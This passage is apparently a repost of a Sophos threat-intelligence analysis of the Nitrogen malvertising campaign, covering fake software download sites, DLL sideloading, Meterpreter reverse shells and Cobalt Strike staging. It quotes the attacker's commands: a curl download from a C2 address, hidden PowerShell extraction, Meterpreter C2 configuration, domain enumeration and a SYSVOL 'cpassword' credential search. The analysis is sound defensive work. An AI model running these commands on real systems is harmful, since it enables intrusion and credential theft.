{"id":22546,"date":"2023-07-26T05:20:55","date_gmt":"2023-07-26T13:20:55","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2023\/07\/26\/news-16276\/"},"modified":"2023-07-26T05:20:55","modified_gmt":"2023-07-26T13:20:55","slug":"news-16276","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/07\/26\/news-16276\/","title":{"rendered":"Into the tank with Nitrogen"},"content":{"rendered":"<p><strong>Credit to Author: Gabor Szappanos| Date: Wed, 26 Jul 2023 10:00:04 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>In mid-June, Sophos X-Ops identified a previously unreported initial-access malware campaign leveraging <a href=\"https:\/\/news.sophos.com\/en-us\/2016\/03\/17\/malvertising-learn-more-about-this-pernicious-problem\/\">malicious advertising (malvertising)<\/a> and impersonating legitimate software to compromise business networks.<\/p>\n<p>This campaign &#8211; which we have dubbed <strong>Nitrogen<\/strong> based on strings found in the code &#8211; is a primarily opportunistic attack campaign abusing Google and Bing ads to target users seeking certain IT tools, with the goal of gaining access to enterprise environments to deploy second-stage attack tools such as Cobalt Strike.<\/p>\n<p>Sophos X-Ops has observed the Nitrogen campaign targeting several organizations in the technology and non-profit sectors in North America. Though Sophos mitigated the infections before further hands-on-keyboard activity occurred, we assess it is likely that the threat actors mean to leverage this infection chain to stage compromised environments for ransomware deployment. 
This assessment is corroborated by recent research from <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\">Trend Micro<\/a> stating it has observed a similar infection chain that led to a <a href=\"https:\/\/news.sophos.com\/en-us\/tag\/blackcat\/\">BlackCat (aka ALPHV)<\/a> ransomware infection.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92934\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png\" alt=\"A flowchart showing a simplified flow for the initial-attack process described in the article\" width=\"640\" height=\"394\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png 966w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png?resize=300,184 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png?resize=768,472 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: An overview of the observed Nitrogen infection chain<\/em><\/p>\n<p>In this article, we&#8217;ll briefly walk through the infection process, which begins when a user searches for certain popular software packages on Google or Bing. Since there are subtle differences in how this stage goes, we have included three examples of different search-to-infection chains, which include a twist designed to troll investigators. We then turn to a detailed description of how the malware operates and what happens once the infected file has been downloaded. (A list of MITRE ATT&amp;CK techniques seen in this attack chain is provided at the end of the article.)<\/p>\n<h3>Nitrogen Malware Family<\/h3>\n<p>While investigating this campaign, X-Ops analysts uncovered a new initial access malware family called Nitrogen. 
The name derives from the components and debug information we found in the samples, which indicate that the developers refer to this project as Nitrogen or Nitronet. The names of these components also indicate a relation to the Metasploit Framework (MSF), which is leveraged in the Nitrogen campaign to generate the reverse shell scripts used in NitrogenStager.<\/p>\n<p>The main components use the following class names:<\/p>\n<ul>\n<li class=\"Codesample\">NitrogenStager<\/li>\n<li class=\"Codesample\">MsfPythonStager<\/li>\n<li class=\"Codesample\">NitronetNativeStager<\/li>\n<li class=\"Codesample\">NitroInstaller<\/li>\n<\/ul>\n<h2>Infection chain<\/h2>\n<p>The observed infection chain starts with malvertising via Google and Bing Ads to lure users to compromised WordPress sites and phishing pages impersonating popular software distribution sites, where they are tricked into downloading trojanized ISO installers.<\/p>\n<p>When downloaded, the installers sideload the malicious NitrogenInstaller DLL containing a legitimate software application bundled with a malicious Python execution environment. The Python package uses Dynamic Link Library (DLL) preloading to execute the malicious NitrogenStager file, which connects to the threat actor\u2019s command-and-control (C2) servers to drop both a Meterpreter shell and Cobalt Strike Beacons onto the targeted system. Throughout the infection chain, the threat actors use uncommon export forwarding and DLL preloading techniques to mask their malicious activity and hinder analysis.<\/p>\n<p>The infection chain involves multiple stages and components, which are still under analysis at this writing. 
The following diagram illustrates our current understanding.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92935\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png\" alt=\"A flow chart showing detail in a portion of the flow of this attack, described later in the text\" width=\"531\" height=\"1056\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png 531w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png?resize=151,300 151w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png?resize=515,1024 515w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/a><\/p>\n<p><em>Figure 2: A portion of the Nitrogen infection chain in greater detail<\/em><\/p>\n<h2>Initial infection<\/h2>\n<p>The Nitrogen malvertising campaign leverages Google and Bing Pay-per-Click (PPC) advertisements to impersonate legitimate-looking websites and trick users into downloading malicious Windows Installer files.<\/p>\n<p>Specifically, the campaign appears to be targeting information technology (IT) users, as the advertised sites impersonate popular software such as <strong>AnyDesk <\/strong>(a remote desktop application), <strong>WinSCP <\/strong>(an SFTP\/FTP client for Windows), and <strong>Cisco AnyConnect VPN<\/strong> installers. In one Managed Detection and Response (MDR) case, we also observed the campaign leverage a trojanized installer for<strong> TreeSize Free<\/strong>, which is a free-disk-space manager. These applications are often used for business-related purposes, so it is likely the threat actors chose to impersonate these installers to try to gain access to enterprise networks.<\/p>\n<p>X-Ops analysts have found several trojanized installers deploying the Nitrogen malware package. The filenames used by those installers are listed below. 
We provide the relevant hashes in the IoC file on our GitHub; note that some filenames were used by more than one trojanized installer.<\/p>\n<ul>\n<li>AnyDesk.iso<\/li>\n<li>AnyDesk_v7.1.11.iso<\/li>\n<li>AnyDesk_v7.1.iso<\/li>\n<li>cisco-anyconnect-4.iso<\/li>\n<li>TreeSizeFreeSetup.iso<\/li>\n<li>winscp.iso<\/li>\n<li>WinSCP_setup.iso<\/li>\n<li>WinSCP-5.21.8-Setup.iso<\/li>\n<li>WinSCP-6.1-Setup.iso<\/li>\n<\/ul>\n<h3>Example: Downloading \u201cWinSCP\u201d<\/h3>\n<p>As reported by <a href=\"https:\/\/infosec.exchange\/@malwareinfosec\/110539178322032927\">@malwareinfosec<\/a>, when a user searches Google for WinSCP, a Google Ad will pop up referencing \u2018Secure File Transfer \u2013 For Windows\u2019 on the site softwareinteractivo[.]com, which is a phishing page that impersonates a guidance blog for system administrators. In our investigation, we observed the searches that redirect in this fashion appear to be geographically limited, but the overall pattern of those limitations is unclear. 
Our investigations have made us aware of hundreds of brands co-opted for malvertising of this sort across multiple campaigns in recent months.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92936\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png\" alt=\"The page displayed at the fraudulent &quot;softwareinteractivo&quot; site\" width=\"640\" height=\"493\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png 1590w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=300,231 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=768,592 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=1024,789 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=1536,1183 1536w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 3: Suspicious <\/em><em>softwareinteractivo[.]com site, reached by clicking a malvertisement<\/em><\/p>\n<p>When the advertisement on softwareinteractivo[.]com is clicked, it redirects the user to a fake download page for WinSCP 6.1 (winsccp[.]com), which drops a malicious ISO file on the user\u2019s computer.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92937\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png\" alt=\"The fake WinSCP download site; note that the URL is similar but not the same\" width=\"640\" height=\"316\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png?resize=300,148 300w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png?resize=768,379 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 4: Winsccp[.]com is a malicious website mimicking the real WinSCP download page (winscp.net)<\/em><\/p>\n<p>Notably, if a user or researcher tries to directly visit the site winsccp[.]com by typing in the URL instead of going through the ad, it redirects to a YouTube video of Rick Astley\u2019s classic \u201cNever Gonna Give You Up\u201d \u2013 effectively rick-rolling researchers. We assess the phishing site is likely inspecting referrer headers to confirm the user has arrived there via a search engine, which is a tactic commonly observed in malvertising campaigns.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92938\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png\" alt=\"A collage of three screen shots showing that typing in the site URL directly got us rickrolled\" width=\"498\" height=\"428\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png 498w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png?resize=300,258 300w\" sizes=\"auto, (max-width: 498px) 100vw, 498px\" \/><\/a><\/p>\n<p><em>Figure 5: Never gonna give (trolling) up (Image credit: Jerome Segura [<\/em><a href=\"https:\/\/infosec.exchange\/@malwareinfosec\/110539178322032927\"><em>@malwareinfosec<\/em><\/a><em>]<\/em><em>)<\/em><\/p>\n<p>The redirect chain from the ad site (in this case, Google) to the fake website to the malicious .ISO is as follows; we have redacted the arguments for each specific step, though we note that softwareinteractivo passes the Google click identifier (gclid) 
unchanged:<\/p>\n<ol>\n<li>https:\/\/www[.]googleadservices[.]com\/pagead\/[snip]<\/li>\n<li>https:\/\/softwareinteractivo[.]com\/streamlining-team-collaboration-the-power-of-for-seamless-file-sharing\/[gclid snip]<\/li>\n<li>https:\/\/winsccp[.]com\/HPVrxkWv?[gclid snip]<\/li>\n<li>https:\/\/winsccp[.]com\/eng\/download[.]php<\/li>\n<li>https:\/\/protemaq[.]com\/wp-content\/update\/iso\/6[.]1\/tusto\/WinSCP-6[.]1-Setup[.]iso<\/li>\n<\/ol>\n<h3>Example: Downloading \u201cCisco AnyConnect\u201d<\/h3>\n<p>In addition to using phishing pages, the threat actors also hosted malware on seemingly compromised WordPress sites, such as mypondsoftware[.]com\/cisco (which mimics the legitimate Cisco download site). Notably, all other links on mypondsoftware[.]com point to legitimate cisco.com web pages, except for the download link for this particular installer (Cisco AnyConnect Secure Mobility Client v4.x), which directs to a phishing page delivering the malicious Nitrogen package.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92939\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png\" alt=\"A WordPress-based site with (stolen) Cisco branding, serving the malicious download\" width=\"640\" height=\"340\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png 1254w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=300,159 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=768,408 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=1024,544 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 6: A compromised WordPress site (mypondsoftware[.]com) distributing Trojanized Cisco AnyConnect Secure Mobility Client v4.x<\/em><\/p>\n<h3>Example: 
Downloading \u201cTreeSize\u201d<\/h3>\n<p>Our analysts also uncovered a malvertisement directing users to a download site impersonating JAM Software&#8217;s TreeSize Free program, which is primarily used for scanning disk space usage. In the case we observed, it appears the user was searching for tools to clean up their filesystem while debugging QuickBooks, which led them to a series of Bing ads for TreeSize. Though the user first clicked on an advertisement for the legitimate TreeSize Free JAM Software site, they shortly pivoted back to Bing and clicked on a secondary advertisement that directed them to tresize[.]com, which served the malicious ISO. Upon the user downloading the malicious ISO file \u201cTreeSizeFreeSetup.iso\u201d hosted on the WordPress site, it was promptly mounted on the system.<\/p>\n<p>Similar to the other distribution sites we found, when the user navigates to the tresize[.]com domain directly, it redirects to YouTube to display the Rick Astley video.<\/p>\n<h2>DLL Sideloading<\/h2>\n<p>As noted above, when users download the trojanized installers, they arrive as ISO images on the infected computer. Windows Explorer then mounts these images as a drive letter, making their contents available from that drive.<\/p>\n<p>One of the files inside the ISO image is the msiexec.exe Windows tool, renamed to install.exe or setup.exe. 
When executed, the renamed msiexec.exe sideloads the malicious msi.dll (NitrogenInstaller) file stored in the same image.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92940\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png\" alt=\"A file directory showing two files, install and msi.dll\" width=\"638\" height=\"105\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png 638w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png?resize=300,49 300w\" sizes=\"auto, (max-width: 638px) 100vw, 638px\" \/><\/a><\/p>\n<p><em>Figure 7: Content of the trojanized installers<\/em><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/05\/03\/doubled-dll-sideloading-dragon-breath\/\">Dynamic link library (DLL) sideloading<\/a> is a popular tactic used by threat actors to mask malicious activity under the guise of a legitimate process. Typically, threat actors attempt to avoid error messages by inserting dummy functions into the sideloaded DLLs for the exports needed by the clean loader executable. In rare cases &#8212; such as when the DLL is an open-source component and can be easily recompiled by the attackers &#8212; the malicious DLL may implement the full functionality of the original legitimate DLL.<\/p>\n<p>In this Nitrogen campaign, however, the threat actors use another tactic that is less commonly seen in sideloading attempts: using DLL proxying by forwarding exported functions (except for the main function MsiLoadStringW that contains the malicious code) to the legitimate msi.dll that resides in the system directory. 
Though DLL proxying is not a particularly novel technique, it typically occurs in DLL hijacking attacks rather than in DLL sideloading or preloading.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92941\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png\" alt=\"A file directory showing the exported functions\" width=\"640\" height=\"143\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png 870w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png?resize=300,67 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png?resize=768,171 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 8: Exported functions of <\/em><em>msi.dll<\/em><\/p>\n<h3>NitrogenInstaller<\/h3>\n<p>The sideloaded msi.dll file &#8211; which the threat actors call NitrogenInstaller \u2013 proceeds to drop a clean installer for the legitimate decoy application (e.g., Inno installer for WinSCP) alongside two Python packages: a legitimate Python archive and a trojanized Python package in an encrypted file of 8-10MB containing the malicious python310.dll file (NitrogenStager). 
The latter is encrypted with the AES CBC algorithm, with the encryption key hardcoded in the installer DLL.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92942\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png\" alt=\"A deceptive normal-looking install window\" width=\"515\" height=\"403\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png 515w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png?resize=300,235 300w\" sizes=\"auto, (max-width: 515px) 100vw, 515px\" \/><\/a><\/p>\n<p><em>Figure 9: Installation of the benign WinSCP dropped by NitrogenInstaller; appears normal, but in the background, there are unwanted passengers<\/em><\/p>\n<p>Some of the NitrogenInstaller samples contained debug information, such as PDB paths, which give an insight into the project structure:<\/p>\n<pre>Y:\\nitronet\\nitrogen\\x64\\Release - msi.dll\\Nitrogen.pdb\nY:\\x64\\Release - msi.dll\\Nitrogen.pdb<\/pre>\n<p>In addition to dropping the clean installer and Python packages, NitrogenInstaller also attempts to elevate its privileges by executing a <a href=\"https:\/\/blogs.quickheal.com\/uac-bypass-using-cmstp\/\">User Account Control (UAC) bypass<\/a> using the CMSTPLUA CLSID (<em>Elevation:Administrator!new:{guid}<\/em>). Various malware and ransomware families have used this method, including LockBit and <a href=\"https:\/\/www.nozominetworks.com\/blog\/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs\/\">BlackMatter<\/a>.<\/p>\n<p>The NitrogenInstaller DLL then creates a registry run key to establish persistence; this key is named &#8220;Python&#8221; (HKEY_USERS\\&lt;User SID&gt;\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Python). 
We also observe a related scheduled task named &#8220;OneDrive Security&#8221; pointing to the binary C:\\Users\\Public\\Music\\python\\pythonw.exe, which has an execution interval of five minutes.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92943\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png\" alt=\"A screen capture showing the Registry with the keys as described in the text\" width=\"640\" height=\"226\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png?resize=300,106 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png?resize=768,271 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 10: The DLL creates a key<\/em><\/p>\n<h4><em>Python Packages<\/em><\/h4>\n<p>As noted above, NitrogenInstaller drops the following two Python packages:<\/p>\n<p>The two directories in Figure 11 show the differences between the legitimate version of the application (via BeaconPack, on the left) and the malicious version (on the right). 
Note the differences between the clean and the malicious python310.dll, and also the variation in directories as called out in the table above.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92944\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png\" alt=\"Side-by-side images of two file directories, showing the file-detail differences between the legitimate and fake python311.dlls\" width=\"640\" height=\"295\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png 1036w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=300,138 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=768,354 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=1024,471 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 11: On the left (green border), the BeaconPack version of the application contains the original, larger python310.dll with legitimate version information; on the right (red border), the malicious version is smaller and has no version number, file description, or company data<\/em><\/p>\n<p>So why did the threat actors drop a legitimate Python package alongside a malicious one? The NitrogenStager Python package is not a viable interpreter; it cannot execute Python scripts. Normally, Python scripts run when pythonw.exe calls the Py_Main function exported by python310.dll in the Python package. However, in the NitrogenStager Python package this function is replaced by malicious connect-back code, meaning the script engine is never loaded and scripts cannot be executed.<\/p>\n<p>However, for the threat actors to be able to conduct later stages of the attack, such as the installation of Cobalt Strike Beacons, they need a working Python environment. 
This explains why the threat actors dropped the legitimate BeaconPack Python Package: to execute Python code needed later in the infection chain.<\/p>\n<h4><em>NitrogenStager<\/em><\/h4>\n<p>To load the NitrogenStager DLL in the malicious Python package, the threat actors leverage <a href=\"https:\/\/support.microsoft.com\/en-gb\/topic\/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1\">DLL preloading<\/a>, which takes advantage of Windows\u2019 own DLL search order when an application attempts to load a library without specifying the full path. In several observed cases, the threat actors renamed the legitimate DLL (python310.dll) to python311.dll (which is stored in the same directory) and copied their own specially crafted malicious stager (NitrogenStager) into the directory under the name python310.dll.<\/p>\n<p>Notably, in the latest version, we noticed the threat actors &#8220;upgraded&#8221; the malicious Python package to version 3.11, where they staged the malicious NitrogenStager under the name python311.dll and renamed the original clean Python DLL to python311x.dll.<\/p>\n<p>As noted above, the NitrogenStager Python package is unable to execute Python scripts, as its main function is replaced with malicious connect-back code and all other exports in the package are forwarded to the original legitimate Python DLL (python311.dll):<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92945\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png\" alt=\"A DLL Export Viewer screen showing the malicious DLL\" width=\"640\" height=\"161\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png 781w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png?resize=300,76 300w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png?resize=768,194 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 12: Python310.dll refers to the export in Python311.dll as python311.{exportname}<\/em><\/p>\n<p>This tactic is similar to the export forwarding technique used earlier when sideloading msi.dll; however, in this case, the original clean DLL was part of the package as a renamed DLL instead of already residing on the system.<\/p>\n<h3>C2 Staging<\/h3>\n<p>The malicious connect-back code in the Py_Main function runs automatically upon execution. Sophos detected NitrogenStager connecting to C2 servers using four different protocols (TCP, TCP over SSL, HTTP, HTTPS). The package contains a separate script for each protocol used (tcp:\/\/, tcpssl:\/\/, http:\/\/, https:\/\/), each of which has the functionality to connect to the C2 server, decode responses (base64+inflate), and execute them. The stagers for the protocols are based on public domain tools likely generated by <a href=\"https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-msfvenom.html\">msfvenom<\/a>, which uses standard command-line options to generate Metasploit payloads.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92946\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png\" alt=\"A Python script as described in text\" width=\"640\" height=\"354\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png?resize=300,166 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png?resize=768,425 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 13: Python script for http:\/\/<\/em><\/p>\n<p>The base64-encoded compressed 
scripts receive the host address and port number. The decoded scripts are fairly standard; the only notable difference is the specific user-agent.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92947\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png\" alt=\"The decoded handler, as described in text\" width=\"640\" height=\"147\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png?resize=300,69 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png?resize=768,176 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 14: Handler for https:\/\/<\/em><\/p>\n<p>We observed multiple variations of the NitrogenStager file (python310.dll), and in some samples, string constants such as the C2 addresses are clearly visible in the code:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92948\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png\" alt=\"A screen of NitrogenStager code\" width=\"610\" height=\"479\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png 610w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png?resize=300,236 300w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p><em>Figure 15: NitrogenStager sample code<\/em><\/p>\n<p>Like the NitrogenInstaller sample, some of the NitrogenStager samples also contain debug information, including PDB paths:<\/p>\n<pre>Z:\\projects\\nitrogen_vs\\x64\\Release - python310emb\\Nitrogen.pdb\nY:\\x64\\Release - python310emb\\Nitrogen.pdb\nY:\\nitronet\\nitrogen\\x64\\Release - msi.dll\\Nitrogen.pdb<\/pre>\n<h2>Meterpreter 
shell<\/h2>\n<p>This next-stage script downloaded by the NitrogenStager DLL is essentially a customization of this <a href=\"https:\/\/github.com\/rapid7\/metasploit-payloads\/blob\/master\/python\/meterpreter\/meterpreter.py\">Meterpreter script<\/a>, with the configuration variables modified. For example, one of the servers delivers the script with these variables on the http:\/\/ protocol:<\/p>\n<pre>HTTP_CONNECTION_URL = 'http:\/\/104.234.119[.]16:8880\/Tu6UHNJiKqMAdBVgZOhOfQWLz0QvKbDdGjzQfqCdxVaakl7csNUiwEdQzgC_lyE\/'\nHTTP_USER_AGENT = 'Mozilla\/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/16.1 Mobile\/15E148 Safari\/604.1'\nPAYLOAD_UUID = '4eee941cd2622aa30074156064e84e7d'\nSESSION_GUID = '386bab57d91a44868452fbf55ce59ff9'<\/pre>\n<p>And these variables on the https:\/\/ protocol:<\/p>\n<pre>HTTP_CONNECTION_URL = 'hxxps:\/\/104.234.119[.]16:4425\/NZAna530Nip9AWgVGZ0wvQmQqVlNzF3vDZ8VNfagijnmurLzImArKHfA\/'\nHTTP_USER_AGENT = 'Mozilla\/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/16.1 Mobile\/15E148 Safari\/604.1'\nPAYLOAD_UUID = '3590276b9df4362a7d016815199d30bd'\nSESSION_GUID = '208fc213c50f4816a3e1e097015c0d3f'<\/pre>\n<p>Once executed, the Python scripts establish a Meterpreter reverse TCP shell, which allows threat actors to remotely execute code on the compromised machine.<\/p>\n<h2>Manual sessions<\/h2>\n<p>In one of the observed cases, the threat actors invoke several commands through the open session, switching to hands-on-keyboard activity:<\/p>\n<pre>curl -k hxxps:\/\/172.86.123[.]127\/python\/ton.zip -o C:\\users\\public\\pictures\\ton.zip\npowershell -w hidden -command Expand-Archive C:\\users\\public\\pictures\\ton.zip -DestinationPath\ntonw.exe work1.py\ntonw.exe work8.py\ntonw.exe work4.py<\/pre>\n<p>These manual commands retrieve a ZIP file from a C2 server (172.86.123[.]127), and also download and execute an 
additional Python environment (Python Package 3), which invokes a series of Python scripts that lead to in-memory execution of Cobalt Strike beacons. Python Package 3 runs from the Pictures subfolder within the Public directory.<\/p>\n<p>The threat actors also run commands to perform discovery and enumerate the domain:<\/p>\n<pre>net group \"Workstation Admins\" \/domain\nfindstr \/S \/I cpassword \\\\&lt;REDACTED&gt;\\sysvol\\&lt;REDACTED&gt;\\policies\\*.xml\nnet group \"{redacted}\" \/domain\nnet localgroup administrators\nnet group \"Domain Admins\" \/domain\nnet group \"{redacted}\" \/domain\nnet group \"{redacted}\" \/domain\nipconfig \/all\nnet group \/domain<\/pre>\n<p>The command findstr \/S \/I cpassword \\\\&lt;REDACTED&gt;\\sysvol\\&lt;REDACTED&gt;\\policies\\*.xml searches for Group Policy Preferences (GPP) settings in XML files, where the &#8220;cpassword&#8221; attribute (a stored credential) may be present. This activity is detected as <strong>EQL-WIN-DIS-PRC-FINDSTR-CPASSWORD-1<\/strong> by Sophos.<\/p>\n<h3>Cobalt Strike servers<\/h3>\n<p>The suspected manual sessions above refer to Python scripts work1.py through work9.py, which are files the threat actors downloaded from the Cobalt Strike C2 server 172.86.123[.]127. (Hashes for the files discussed in this subsection are included in the IoC file on our GitHub.)<\/p>\n<p>Once the work*.py scripts load, they execute a compiled object, which 